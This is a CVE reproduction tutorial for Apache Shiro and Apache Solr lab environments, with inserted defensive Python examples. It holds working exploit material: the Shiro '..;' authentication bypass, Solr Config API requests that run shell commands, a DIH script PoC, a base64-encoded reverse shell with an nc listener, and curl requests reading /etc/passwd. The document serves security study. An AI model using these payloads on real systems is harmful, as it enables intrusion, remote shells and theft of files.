Article directory
- Service Attack and Defense – Framework Security & CVE Reproduction & Apache Shiro & Apache Solr Vulnerability Reproduction
  - Middleware list
  - Common development frameworks
  - Apache Shiro – Component Framework Security
    - Disclosed security issues
    - Vulnerability reproduction
      - Apache Shiro Authentication Bypass Vulnerability (CVE-2020-1957)
      - CVE-2020-11989 Authentication Bypass Vulnerability
      - CVE-2016-4437 Shiro-550 & CVE-2019-12422 Shiro-721 vulnerability reproduction
  - Apache Solr – Component Framework Security
    - Disclosed security issues
    - Vulnerability reproduction
      - Apache Solr remote command execution vulnerability (CVE-2017-12629)
      - Arbitrary file read & command execution (CVE-2019-17558)
      - Remote command execution vulnerability (CVE-2019-0193)
      - Solr arbitrary file read & SSRF (CVE-2021-27905)
Service Attack and Defense - Framework Security & CVE Reproduction & Apache Shiro & Apache Solr Vulnerability Reproduction
Middleware list
Middleware and framework list:
IIS, Apache, Nginx, Tomcat, Docker, K8s, WebLogic, JBoss, WebSphere, Jenkins, GlassFish, Jetty, Jira, Struts2, Laravel, Solr, Shiro, ThinkPHP, Spring, Flask, jQuery, etc.
Common development frameworks
1. Development framework - PHP - Laravel, ThinkPHP
2. Development framework - Java web - Struts2, Spring
3. Development framework - Python - Django, Flask
4. Development framework - JavaScript - Node.js, jQuery
5. Other frameworks - Java - Apache Shiro & Apache Solr
Common development frameworks by language:
PHP: ThinkPHP, Laravel, Yii, CodeIgniter, CakePHP, Zend, etc.
Java: Spring, MyBatis, Hibernate, Struts2, Spring Boot, etc.
Python: Django, Flask, Bottle, TurboGears, Tornado, Web2py, etc.
JavaScript: Vue.js, Node.js, Bootstrap, jQuery, Angular, etc.
Apache Shiro-Component Framework Security
Detailed explanation: Shiro (Java security framework)
Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography and session management. With Shiro's easy-to-understand API you can quickly secure any application, from the smallest mobile app to the largest web and enterprise applications.
Disclosed security issues
Apache Shiro <= 1.2.4 default rememberMe key leads to command execution [CVE-2016-4437]
Apache Shiro < 1.3.2 authentication bypass vulnerability [CVE-2016-6802]
Apache Shiro < 1.4.2 rememberMe cookie padding oracle vulnerability [CVE-2019-12422]
Apache Shiro < 1.5.2 authentication bypass vulnerability [CVE-2020-1957]
Apache Shiro < 1.5.3 authentication bypass vulnerability [CVE-2020-11989]
Apache Shiro < 1.6.0 authentication bypass vulnerability [CVE-2020-13933]
Apache Shiro < 1.7.1 permission bypass vulnerability [CVE-2020-17523]
…
Vulnerability reproduction
Apache Shiro Authentication Bypass Vulnerability (CVE-2020-1957)
Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography and session management.
In Apache Shiro before 1.5.2, when Shiro is used with Spring dynamic controllers, a specially crafted request containing the sequence "..;" in the path bypasses the authentication filter chain. Shiro truncates the request path at the first semicolon before matching it against its filter-chain rules, while the servlet container strips the semicolon path parameter and resolves "..", so the two components see different paths and a request Shiro treats as anonymous is still dispatched to the protected controller.
Scope of impact: Apache Shiro < 1.5.2
Lab environment: vulhub
Reference: Apache Shiro authentication bypass vulnerability (CVE-2020-1957) reproduction
Start the environment and open the web interface.
A direct request to the administration page /admin/ is refused and redirected to the login page.
Construct a malicious request that bypasses the authentication check and reaches the administration page:
payload: /xxx/..;/admin/
http://your-ip:8080/xxx/..;/admin/
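The path-handling mismatch behind this bypass, as an added example that is not part of the original article and not Shiro's or Tomcat's code: a simplified Python model of Shiro's pre-1.5.2 path cleaning (cut at the first semicolon, no dot-segment normalisation) beside what the servlet container and Spring actually route (semicolon parameters stripped from every segment, then ".." resolved), plus a "fixed" variant that normalises before matching. The "/admin/**" rule, the tiny stand-in Ant matcher and the sample URIs are assumptions made for illustration.

```python
# Added example for CVE-2020-1957: not the article's code, not Shiro's code.
# Both "views" of the request path are simplified models written for this page.
import posixpath

PROTECTED_PREFIX = "/admin"   # stands in for the filter-chain rule "/admin/** = authc"


def shiro_path_before_1_5_2(request_uri: str) -> str:
    """Old Shiro behaviour (simplified): cut the URI at the first ';' and
    match the remainder as-is, with no dot-segment normalisation."""
    semi = request_uri.find(";")
    return request_uri[:semi] if semi != -1 else request_uri


def container_path(request_uri: str) -> str:
    """What the servlet container / Spring DispatcherServlet routes (simplified):
    ';param' is stripped from every path segment, then '..' is resolved."""
    segments = [seg.split(";", 1)[0] for seg in request_uri.split("/")]
    cleaned = "/".join(segments)
    normalised = posixpath.normpath(cleaned)
    # posixpath.normpath drops a trailing slash; keep it so "/admin/" stays "/admin/"
    if cleaned.endswith("/") and not normalised.endswith("/"):
        normalised += "/"
    return normalised


def shiro_path_fixed(request_uri: str) -> str:
    """Post-fix behaviour (simplified): strip ';' parameters per segment and
    normalise before matching, so Shiro and the container agree."""
    return container_path(request_uri)


def ant_matches_protected(path: str) -> bool:
    """Minimal stand-in for AntPathMatcher on the pattern '/admin/**'."""
    return path == PROTECTED_PREFIX or path.startswith(PROTECTED_PREFIX + "/")


def bypasses(request_uri: str, shiro_view=shiro_path_before_1_5_2) -> bool:
    """True when Shiro's filter chain lets the request through unauthenticated
    while the container still dispatches it to the protected controller."""
    return (not ant_matches_protected(shiro_view(request_uri))
            and ant_matches_protected(container_path(request_uri)))


if __name__ == "__main__":
    for uri in ("/admin/", "/xxx/..;/admin/", "/xxx/..;/admin/users"):
        print(f"{uri:24} shiro<1.5.2 sees {shiro_path_before_1_5_2(uri):10} "
              f"container sees {container_path(uri):14} "
              f"bypass={bypasses(uri)} after fix={bypasses(uri, shiro_path_fixed)}")
```

The lesson generalises beyond this one payload: any time an access-control layer and the dispatching layer canonicalise the path differently, the attacker only needs an input that the first layer leaves unmatched and the second layer folds into the protected route.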
CVE-2020-11989 Authentication Bypass Vulnerability
In Apache Shiro before 1.5.3, when Shiro is used with Spring controllers, a specially crafted request may lead to an authentication bypass.
Lab environment: vulfocus
Start the environment and open the web interface.
PoC: /admin/
Scope of impact: Apache Shiro < 1.5.3
The vulfocus environment may be broken and not bypassable; in that case use the GitHub project below for testing. Note that it targets the later permission-bypass issue CVE-2020-17523 (Apache Shiro < 1.7.1) rather than CVE-2020-11989 itself.
Project address: shiro-cve-2020-17523
Build it after downloading; see the project documentation for details.
CVE-2016-4437 Shiro-550 & CVE-2019-12422 Shiro-721 vulnerability reproduction
Vulnerability principle and reproduction process, see:
Shiro deserialization vulnerability (Shiro-550 / Shiro-721 deserialization)
Apache Solr - Component Framework Security
Detailed explanation: Solr detailed explanation
Apache Solr is an open-source search server written in Java, implemented mainly over HTTP on top of Apache Lucene. Solr is a high-performance full-text search server based on Lucene (originally developed on Java 5). It is a stand-alone enterprise search application server that exposes a Web-service-like API: clients submit XML documents in a defined format to the server over HTTP to build indexes, and issue search requests with HTTP GET to receive results in XML format.
Disclosed security issues
Remote command execution (RCE) (CVE-2017-12629)
XML external entity injection (XXE) (CVE-2017-12629)
Arbitrary file read and command execution (CVE-2019-17558)
Remote command execution vulnerability (CVE-2019-0192)
Remote command execution vulnerability (CVE-2019-0193)
Unauthenticated ConfigSet upload vulnerability (CVE-2020-13957)
Apache Solr SSRF (CVE-2021-27905)
…
Vulnerability reproduction
Apache Solr remote command execution vulnerability (CVE-2017-12629)
Apache Solr is an open-source search server written in Java, implemented mainly over HTTP on top of Apache Lucene. Roughly, documents are added to a search collection by posting XML over HTTP, and the collection is queried over HTTP with results returned as XML or JSON.
Two vulnerabilities were found in versions before 7.1.0: an XML external entity (XXE) injection and a remote command execution (RCE) through the Config API's RunExecutableListener. The two can be chained into one exploit chain, and both are tracked as CVE-2017-12629.
Environment: vulhub
Reference: CVE-2017-12629 RCE reproduction
Start the environment and open the web interface.
Exploitation:
First register a listener through the Config API of the demo core. exe is the program to run and args are its arguments; the postCommit event means the listener fires after every commit.
// Request:
POST /solr/demo/config HTTP/1.1
Host: 192.168.100.134:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Connection: close
Content-Length: 161

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/rumilc.txt"]}}
Then perform an update operation to trigger the listener just added:
// Request:
POST /solr/demo/update HTTP/1.1
Host: 192.168.100.134:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Connection: close
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]
Verify:
docker ps            (find the container id)
docker exec -it <container id> bash
The file /tmp/rumilc.txt has been created.
The command can be replaced with a reverse-shell command; the logic is the same, but the command needs to be base64-encoded (see the encoding used in the CVE-2019-0193 section below).
Arbitrary file read & command execution (CVE-2019-17558)
Solr is a popular, ultra-fast open-source enterprise search platform built on Apache Lucene(TM).
Apache Velocity is a Java-based template engine that provides a template language for referencing objects defined in Java code. Velocity is an open-source project of the Apache Foundation whose aim is to keep the presentation layer and the business-logic layer of a web application separate (the MVC pattern). Apache Solr versions 5.0.0 through 8.3.1 contain an input-validation flaw: an attacker who can enable the custom Velocity template feature can exploit a Velocity server-side template injection (SSTI) and execute arbitrary code on the Solr host.
Lab environment: vulfocus
Start the environment and open the web interface.
Manual reproduction reference: Apache Solr Remote Code Execution via Velocity Custom Template
Script tool: EXP address
The script performs all the steps in one go and runs the command:
python2 solr_rce.py http://192.168.100.134:14226 id
python2 solr_rce.py http://192.168.100.134:14226 whoami
Read a file:
python2 solr_rce.py http://192.168.100.134:14226 "cat /etc/passwd"
Remote command execution vulnerability (CVE-2019-0193)
Affected: Apache Solr < 8.2.0
Apache Solr is an open-source search server written in Java, implemented mainly over HTTP on top of Apache Lucene. The vulnerability lies in Solr's DataImportHandler (DIH), an optional but commonly used module for importing data from databases and other sources. The entire DIH configuration can be supplied in the dataConfig parameter of an external request, and because a DIH configuration may contain scripts (executed by the ScriptTransformer), an attacker can craft a request whose script runs on the server, leading to remote command execution.
Lab environment: vulhub
Reference: Reproduction of the Apache Solr remote command execution vulnerability (CVE-2019-0193)
Start the environment and open the web interface.
On first access the management page is not usable yet: the example DIH core has to be created first.
Run the command:
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db
After the command completes, wait a moment; the Apache Solr management page is then reachable without logging in.
Next, open the core just created (test), select the Dataimport function and enable Debug mode.
Fill in the following PoC:
<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
    function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/rumilc.txt"); }
  ]]></script>
  <document>
    <entity name="stackoverflow" url="https://stackoverflow.com/feeds/tag/solr" processor="XPathEntityProcessor" forEach="/feed" transformer="script:poc" />
  </document>
</dataConfig>
Click "Execute with this Configuration" to run it.
After execution, wait a moment.
Verify:
docker ps
docker exec -it <container id> bash
The file /tmp/rumilc.txt has been created.
The command can be replaced with a reverse-shell command. Runtime.exec does not run the string through a shell, so a one-liner with redirections has to be base64-encoded and wrapped. Original command and its encoded form:
sh -i >& /dev/tcp/192.168.100.1/8888 0>&1
After encoding: bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}
PoC:
<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
    function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"); }
  ]]></script>
  <document>
    <entity name="stackoverflow" url="https://stackoverflow.com/feeds/tag/solr" processor="XPathEntityProcessor" forEach="/feed" transformer="script:poc" />
  </document>
</dataConfig>
Start a listener on the attacking host:
nc -lvvp 8888
After execution, wait a moment.
The reverse shell connects back successfully.
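Two details this step leaves implicit, as an added example written for this page (not the article's code and not Solr's): why the reverse shell must be wrapped as bash -c {echo,...}|{base64,-d}|{bash,-i} (java.lang.Runtime.exec(String) tokenises on whitespace and starts the program directly, so ">&" and "/dev/tcp/..." would become literal arguments of sh rather than shell syntax), and a check that flags a script-bearing dataConfig like the one above in a captured request. The exec model is a simplification of the Java behaviour, and the sample dataConfig is constructed to match the page's PoC.

```python
# Added example: not the article's code, not Solr's code.
# Models Runtime.exec tokenisation, builds/decodes the {echo,...} wrapper,
# and audits a DIH dataConfig for the pieces CVE-2019-0193 abuses.
import base64
import re
import xml.etree.ElementTree as ET


def java_exec_argv(command: str) -> list:
    """Runtime.exec(String) splits on whitespace and runs argv[0] directly;
    '>&', '|' and '/dev/tcp/...' are passed as literal arguments, never
    interpreted, so 'sh -i >& /dev/tcp/...' cannot work as written."""
    return command.split()


def encode_bash_payload(shell_cmd: str) -> str:
    """Build the space-free wrapper. After tokenisation bash receives one
    argument; its brace expansion turns {echo,X} into 'echo X' and so on."""
    b64 = base64.b64encode(shell_cmd.encode()).decode()
    return "bash -c {echo," + b64 + "}|{base64,-d}|{bash,-i}"


def decode_bash_payload(wrapped: str) -> str:
    """Reverse the wrapper (what a responder does with a captured payload)."""
    match = re.search(r"\{echo,([A-Za-z0-9+/=]+)\}", wrapped)
    if not match:
        raise ValueError("not a {echo,<base64>} wrapper")
    return base64.b64decode(match.group(1)).decode()


def audit_data_config(xml_text: str) -> list:
    """Flag the parts of a DIH dataConfig that CVE-2019-0193 relies on:
    an inline <script>, a transformer="script:..." on an entity, and a
    URLDataSource (the entity fetch that drives the transformer)."""
    findings = []
    root = ET.fromstring(xml_text)
    for script in root.iter("script"):
        findings.append("inline <script> present")
        body = script.text or ""
        if re.search(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec", body):
            findings.append("script calls Runtime.getRuntime().exec")
    for ds in root.iter("dataSource"):
        if ds.get("type") == "URLDataSource":
            findings.append("URLDataSource (outbound fetch controlled by the request)")
    for ent in root.iter("entity"):
        transformer = ent.get("transformer", "")
        if "script:" in transformer:
            findings.append(f"entity '{ent.get('name')}' uses transformer={transformer}")
    return findings


# Constructed sample in the same shape as the page's PoC, for offline use.
SAMPLE_DATA_CONFIG = """<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
    function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/rumilc.txt"); }
  ]]></script>
  <document>
    <entity name="stackoverflow" url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor" forEach="/feed" transformer="script:poc"/>
  </document>
</dataConfig>"""

if __name__ == "__main__":
    raw = "sh -i >& /dev/tcp/192.168.100.1/8888 0>&1"
    print("argv seen by Runtime.exec:", java_exec_argv(raw))
    wrapped = encode_bash_payload(raw)
    print("wrapped:", wrapped)
    print("argv seen by Runtime.exec:", java_exec_argv(wrapped))
    print("decoded:", decode_bash_payload(wrapped))
    for finding in audit_data_config(SAMPLE_DATA_CONFIG):
        print("FINDING:", finding)
```

The wrapper works because the only whitespace in it separates bash, -c and a single third argument; everything inside that argument is reconstructed by bash's own brace expansion, which is why the same trick appears in most Java-side command-injection payloads.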
Solr arbitrary file read & SSRF (CVE-2021-27905)
Apache Solr is an open-source search server. The issue stems from missing validation of input: when Apache Solr runs without authentication, an attacker can send requests that enable a specific configuration option (RemoteStreaming) and then supply a stream.url pointing at file:// or at internal hosts, resulting in SSRF or arbitrary file reads on the server. Note that CVE-2021-27905 proper is the ReplicationHandler masterUrl/leaderUrl SSRF fixed in Solr 8.8.2; the RemoteStreaming file read reproduced here is the closely related weakness from the vulhub environment, where the Config API allowed enabling RemoteStreaming without authentication.
Lab environment: vulhub
Reference: Apache Solr RemoteStreaming arbitrary file read and SSRF
Start the environment and open the web interface.
Exploitation:
// First, list the cores to obtain the core name (demo here):
http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json
Send the following request to the demo core's Config API to enable RemoteStreaming:
// Request:
POST /solr/demo/config HTTP/1.1
Host: 192.168.100.134:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 80

{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
Send the request.
Then read an arbitrary file through stream.url:
curl -i -s -k "http://your-ip:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd"
The file is read successfully.
View group information:
curl -i -s -k "http://your-ip:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/group"
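A check covering the three Config API abuses on this page, as an added example that is not from the original article and not Solr's code: it walks any Config API JSON (a captured POST /config body, a persisted ConfigOverlay, or a GET /config response) and flags a RunExecutableListener (the CVE-2017-12629 section), a VelocityResponseWriter with params.resource.loader.enabled set (the setting the CVE-2019-17558 exploit turns on, taken from the public advisory rather than from this page), and enableRemoteStreaming (this section). The sample bodies are constructed: the listener and set-property bodies mirror the requests shown above, and the Velocity body is an assumption in the shape of the public PoC.

```python
# Added example: not the article's code and not Solr's code.
# Audits Solr Config API JSON for the settings abused in this article's Solr sections.
import json

EXEC_LISTENER_CLASSES = {"solr.RunExecutableListener",
                         "org.apache.solr.core.RunExecutableListener"}
VELOCITY_CLASSES = {"solr.VelocityResponseWriter",
                    "org.apache.solr.response.VelocityResponseWriter"}


def _truthy(value) -> bool:
    return value is True or str(value).strip().lower() == "true"


def audit_solr_config(obj, path="$") -> list:
    """Walk arbitrary JSON (a captured POST /config body, a ConfigOverlay, or a
    GET /config response) and return (json_path, reason) findings."""
    findings = []
    if isinstance(obj, dict):
        cls = obj.get("class")
        if cls in EXEC_LISTENER_CLASSES:
            findings.append((path, f"RunExecutableListener exe={obj.get('exe')!r} "
                                   f"dir={obj.get('dir')!r} args={obj.get('args')!r}"))
        if cls in VELOCITY_CLASSES and _truthy(obj.get("params.resource.loader.enabled")):
            findings.append((path, "VelocityResponseWriter with params.resource.loader.enabled=true "
                                   "(request-supplied templates are rendered)"))
        for key, value in obj.items():
            # Matches both the dotted set-property form and the nested GET /config form.
            if key.rsplit(".", 1)[-1] == "enableRemoteStreaming" and _truthy(value):
                findings.append((f"{path}.{key}", "enableRemoteStreaming=true "
                                                  "(stream.url may read file:// and reach internal hosts)"))
            findings.extend(audit_solr_config(value, f"{path}.{key}"))
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            findings.extend(audit_solr_config(value, f"{path}[{i}]"))
    return findings


def audit_solr_config_text(text: str) -> list:
    """Same audit over a raw JSON string, e.g. a request body pulled from a proxy log."""
    return audit_solr_config(json.loads(text))


# Constructed samples. The first and third mirror the request bodies shown in
# this article; the second is the shape of the public CVE-2019-17558 PoC body
# (an assumption, not taken from this article).
SAMPLE_BODIES = {
    "add-listener (CVE-2017-12629)":
        '{"add-listener":{"event":"postCommit","name":"newlistener",'
        '"class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/",'
        '"args":["-c","touch /tmp/rumilc.txt"]}}',
    "velocity writer (CVE-2019-17558)":
        '{"update-queryresponsewriter":{"startup":"lazy","name":"velocity",'
        '"class":"solr.VelocityResponseWriter","template.base.dir":"",'
        '"solr.resource.loader.enabled":"true","params.resource.loader.enabled":"true"}}',
    "remote streaming":
        '{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}',
    "benign cache tuning":
        '{"set-property":{"query.filterCache.size":512}}',
}

if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        hits = audit_solr_config_text(body)
        print(f"{label}: {'CLEAN' if not hits else ''}")
        for json_path, reason in hits:
            print(f"  {json_path}: {reason}")
```

Because the Config API persists these changes, the same walk run against the core's stored overlay finds a listener or writer that an attacker planted long after the original request has left the proxy logs; the durable fix is to put authentication in front of /solr and to restrict the Config API rather than to rely on spotting the request.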
For security issues and vulnerability reproductions of other development frameworks, see:
Framework Security - CVE Reproduction & Spring & Struts & Laravel & ThinkPHP Vulnerability Reproduction
Framework Security - CVE Vulnerability Reproduction & Django & Flask & Node.js & jQuery Framework Vulnerability Reproduction